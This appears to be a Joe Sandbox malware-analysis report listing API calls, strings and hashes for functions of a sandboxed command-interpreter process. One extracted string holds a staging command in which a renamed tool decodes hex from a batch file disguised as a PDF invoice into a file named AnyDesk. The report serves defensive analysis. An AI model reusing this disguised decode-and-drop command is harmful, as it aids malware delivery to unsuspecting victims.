                                                                                          • Instruction Fuzzy Hash: 9741CE32B0A783A6EE208B10E85437967A0FF99B94F548534DA4EC77D1EF3CE449A740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                          • String ID:
                                                                                          • API String ID: 1591002910-0
                                                                                          • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                          • Instruction ID: 789c18de12357a51703056f8eb462a67878a1af29206af5288450d46688aac36
                                                                                          • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                          • Instruction Fuzzy Hash: 59F07A34A0B783EBE6148B20E865078BBB0FB8E722F558174D90E87331DF7CA4059B00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: DriveType
                                                                                          • String ID: :
                                                                                          • API String ID: 338552980-336475711
                                                                                          • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                          • Instruction ID: 10c3e276709585b532891a5257c16b276d064a047a1e428d704e57ce42a55034
                                                                                          • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                          • Instruction Fuzzy Hash: 23E06D7661964186E7209B60E4910AAB7B1FB8D349F941525EA8DC3724DF3CD249CB08
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF6A0E85B52
                                                                                            • Part of subcall function 00007FF6A0E84224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E84297
                                                                                            • Part of subcall function 00007FF6A0E84224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E842D7
                                                                                            • Part of subcall function 00007FF6A0E84224: memset.MSVCRT ref: 00007FF6A0E842FD
                                                                                            • Part of subcall function 00007FF6A0E84224: memset.MSVCRT ref: 00007FF6A0E84368
                                                                                            • Part of subcall function 00007FF6A0E84224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E84380
                                                                                            • Part of subcall function 00007FF6A0E84224: wcsrchr.MSVCRT ref: 00007FF6A0E843E6
                                                                                            • Part of subcall function 00007FF6A0E84224: lstrcmpW.KERNELBASE ref: 00007FF6A0E84401
                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6A0E85BC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 497088868-0
                                                                                          • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                          • Instruction ID: a8c44aec8ea05b04e96e2024b8d3491570abd9875239abdf5d767c39466e4258
                                                                                          • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                          • Instruction Fuzzy Hash: D531E631F0E78366FA24EB21A4901BDA295FF89BC0F545435E94EC7B96DE3CE506A700
                                                                                          APIs
                                                                                          • FindClose.KERNELBASE(?,?,?,00007FF6A0E9EAC5,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E83A56
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseFind
                                                                                          • String ID:
                                                                                          • API String ID: 1863332320-0
                                                                                          • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                          • Instruction ID: bce2ef4d6577816381a9de1f4d236266a82175bf3d6a5cb04f9427386be6c25c
                                                                                          • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                          • Instruction Fuzzy Hash: 76012830E0A683F6EB588765A540139A6A0FF88B80B60C170D54DC3395EE2CF48AE300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 1412018758-0
                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                          • Instruction ID: 09860122d362fea8b796f8be254fdb9b3d35f5cb3d2fe6d8a396ba1c9d330b46
                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                          • Instruction Fuzzy Hash: 4DE01261F5B707B6FE182B62684117812547F5D741F5C1470DD1D85382FE2CA4A9A310
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                          • Instruction ID: ae6706625a2695a46215ad74246964e1af96132dc94ca0402fa9ed17e386f87d
                                                                                          • Instruction Fuzzy Hash: CAF08132E1AB4392EB548B15F840178B7A0FB8AB00B589035D90E83355CF3CE485D700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: exit
                                                                                          • String ID:
                                                                                          • API String ID: 2483651598-0
                                                                                          • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                          • Instruction ID: a5faabaf9eb885b14219be0b802b51cd4044051a8ec45e5ae1fcbda3fcf4e747
                                                                                          • Instruction Fuzzy Hash: 10C08C70B0A647ABFB2C6B71289103D99E9BF4D302F05683CCA0BC1382EE2CD80C9200
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: DefaultUser
                                                                                          • String ID:
                                                                                          • API String ID: 3358694519-0
                                                                                          • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                          • Instruction ID: 05a93d95d120a1b8f572d343fdd5040c973b049c9a3fe1b9f0d18eb7b4895aea
                                                                                          • Instruction Fuzzy Hash: 44E02BF3D0A253ABF5582F4160413F41953FB7A783FC44031D70D817C04D2D28457208
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID:
                                                                                          • API String ID: 2221118986-0
                                                                                          • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                          • Instruction ID: 5de4b03ae947725fb72120dae8bd24d2aabe88b2246520cbd8cfe5316431820a
                                                                                          • Instruction Fuzzy Hash: FDF0E231B0A78351FA408B56B9401296290AF88BF0F088334EF7D87BC9EE3CD4528300
                                                                                          APIs
                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97F44
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E97F5C
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97F9E
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E97FFF
                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98020
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98036
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98061
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E98075
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E980D6
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E980EA
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E98177
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E9819A
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981BD
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981DC
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E981FB
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E9821A
                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF6A0E98239
                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98291
                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E982D7
                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E982FB
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E9831A
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98364
                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF6A0E98378
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E9839A
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E983AE
                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E983E6
                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98403
                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF6A0E98418
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                          • API String ID: 3637805771-3100821235
                                                                                          • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                          • Instruction ID: 667d13eb1a9a7d81c2d73f7e9bab80e0b4037ced7dca74167b9658d734861781
                                                                                          • Instruction Fuzzy Hash: 79E1A272A0A693AAE7108F65E900179BBB1FB4DBD5B549231DD1E937A0DF3CA405E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                          • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                          • API String ID: 1795611712-3662956551
                                                                                          • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                          • Instruction ID: 352548f889852567d24aceffab15a8bbe482478e072a27fee47c09ea6970b0f6
                                                                                          • Instruction Fuzzy Hash: 93E1AF72E0E643A6EB508F64A8406F9A7A1FF49788F944132E94ED7796DF3CE504E340
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                          • String ID: \\?\
                                                                                          • API String ID: 628682198-4282027825
                                                                                          • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                          • Instruction ID: c421523efc415085dede0690023eb7b97bf1ef95be863617260879444463929b
                                                                                          • Instruction Fuzzy Hash: 88E18D32B0A783A6EB649F24D8502F963A1FB89749F445139EA0E877D5EF3CE549D300
                                                                                          APIs
                                                                                          Strings
                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk, xrefs: 00007FF6A0E8C9F1
                                                                                          • GOTO, xrefs: 00007FF6A0E7D0A3
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                          • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk$GOTO
                                                                                          • API String ID: 3863671652-182410556
                                                                                          • Opcode ID: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                                                          • Instruction ID: 0ffa25dec4ac35a407d619121735f3715ed87d0b518fb84cf06155fa83726f4c
                                                                                          • Instruction Fuzzy Hash: 30E19D32E0F683A6FA649B25A4543B966A1FF8A750F544139DA1EC23D2DF3CE845A700
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                          • String ID: COPYCMD$\
                                                                                          • API String ID: 3989487059-1802776761
                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                          • Instruction ID: 9f2aa5cf0865cdfd7e234e21ca3244d37e17bc5270b28c6447b3094c70056cde
                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                          • Instruction Fuzzy Hash: 9FF1D576B0A787A1EA649B25D4402BAA3A0FF49BC8F148135DE4E87795EF3CE445E300
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: Time$File$System$FormatInfoLocalLocale
• String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
• API String ID: 55602301-2548490036
• Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
• Instruction ID: 4fface3044e28e1a012421e08aaaa3b72b1c64a5e24605b3628407a8f93d4631
• Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
• Instruction Fuzzy Hash: ABA1C472A1A743E6EB208F10E4502BA77B5FB98754F504136EA5E83794EF7CE548E700
APIs
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
• String ID:
• API String ID: 3935429995-0
• Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
• Instruction ID: e239a4b13c2432d97a80d6835260837ee77f12c1ccb578403ad5e12e1ba6e3a1
• Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
• Instruction Fuzzy Hash: 4E61C036A0966392E714DF21A404679BBB4FF8DF96F259175EE4A83790EF3CD4019700
APIs
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
• Instruction ID: cc55a70b1ef88f189a443a5ee06ccb06b466f31c0abfcdd74b439412a4ceda93
• Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
• Instruction Fuzzy Hash: 9391B132A0A683A6EB648F35D8102FDB6A0FB89B85F054135DA4F87794EF3CD545E300
APIs
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: memset$BufferConsoleInfoScreen
• String ID:
• API String ID: 1034426908-0
• Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
• Instruction ID: 2c83b55237c779a99e1d0732320776a39781864c7c35da457077c81467b1ce50
• Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
• Instruction Fuzzy Hash: EFF1BE32B0A783AAEB64CF21D8402E967A4FF45788F444135DA5E8BB96DF3CE544E700
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AA85
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AACF
